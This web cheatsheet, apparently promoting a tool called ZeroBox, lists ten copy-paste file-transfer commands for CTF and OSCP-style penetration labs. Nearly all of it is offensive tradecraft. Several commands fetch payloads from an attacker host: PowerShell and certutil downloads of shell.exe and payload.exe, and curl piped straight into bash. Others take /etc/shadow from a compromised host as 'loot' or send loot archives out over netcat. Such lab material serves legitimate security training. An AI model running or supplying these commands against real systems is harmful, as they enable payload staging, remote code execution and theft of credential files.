File Transfers cheatsheet
10 copy-paste commands for file transfers in CTFs and OSCP-style labs. Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.
Python 3 Quick HTTP Server
Spawn quick HTTP file hosting server on attacker machine on port 8000.
python3 -m http.server 8000pythonhttpdownload
PowerShell In-Memory Download & Execute
Download payload from attacker HTTP server into Windows target.
powershell -c "Invoke-WebRequest -Uri http://{LHOST}:8000/shell.exe -OutFile C:\Windows\Temp\shell.exe"powershelliwrdownloadwindows
Certutil.exe Windows Native File Fetcher
Use built-in Windows certutil utility to download files bypassing standard restrictions.
certutil -urlcache -split -f http://{LHOST}:8000/payload.exe C:\Temp\payload.execertutillolbaswindowsdownload
Impacket SMB Server File Share
Host local folder as unauthenticated SMB share accessible by Windows machines.
sudo impacket-smbserver share $(pwd) -smb2supportimpacketsmbtransfer
Base64 Binary Pipe (Linux)
Encode binary file into single-line Base64 string for copy-pasting over low-priv shell.
cat file.bin | base64 -w 0base64transferlinux
Base64 Binary Reconstruct (Windows PowerShell)
Reconstruct Base64 string back into executable binary on target Windows machine.
[IO.File]::WriteAllBytes("C:\Temp\tool.exe", [Convert]::FromBase64String("BASE64_STRING"))base64powershelltransferwindows
SMB Share Drive Mount & Copy (Windows)
Mount remote attacker SMB share as network drive letter and copy tools.
net use Z: \\{LHOST}\share /user:guest "" && copy Z:\tool.exe C:\Temp\tool.exesmbnet-usetransferwindows
SCP Secure File Download from Remote Target
Download looted databases or shadow files from compromised host over SSH.
scp -P 22 {USER}@{TARGET_IP}:/etc/shadow ./loot_shadow.txtscpsshlootdownload
Netcat Raw TCP File Stream
Stream files or directory tarballs over raw TCP socket between hosts.
# On Receiver:
nc -lvnp 9001 > loot.tar.gz
# On Sender:
nc {LHOST} 9001 < loot.tar.gznetcatstreamtransfer
cURL to Bash In-Memory Execution
Download and pipe shell scripts straight into memory without touching disk.
curl -sSL http://{LHOST}:8000/script.sh | bashcurlbashstagerin-memory
Use these commands with your values filled in. ZeroBox interpolates target IP, domain and credentials into every command. Open the cheatsheet